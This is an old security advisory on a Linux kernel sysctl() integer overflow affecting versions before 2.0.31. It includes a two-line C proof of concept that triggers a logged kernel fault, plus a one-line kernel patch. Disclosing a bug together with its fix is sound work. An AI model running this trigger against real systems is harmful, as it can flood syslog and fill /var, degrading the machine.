Linux prior to 2.0.31


    Solar Designer posted following about the sysctl() problem. This
    one is just a possibility to generate a fault in the kernel, which
    gets logged, and allows fast syslog (and /var) flooding. Not too
    serious.  However, it shows how an integer multiply overflow can
    cause a security hole.

    #include <sys/sysctl.h>

    main() {
      sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0);
    /* 0x80000000 can be replaced with 0xC0000000 -- both are negative, and
     * produce a zero when multiplied by sizeof(int) */

    There would also be a similar problem in getgroups() if gid_t  was
    larger  than  2  bytes  long,  this  should  be  fixed if gid_t is
    changed some day.


    Should get fixed in 2.0.31.  Fast fix:

    --- /extra/linux-2.0.30/kernel/sysctl.c Sat Apr 19 20:43:22 1997
    +++ linux/kernel/sysctl.c       Mon Jun  2 23:05:52 1997
    @@ -180,7 +180,7 @@
            struct ctl_table_header *tmp;
            void *context;

    -       if (nlen == 0 || nlen >= CTL_MAXNAME)
    +       if (nlen <= 0 || nlen >= CTL_MAXNAME)
                    return -ENOTDIR;

            error = verify_area(VERIFY_READ,name,nlen*sizeof(int));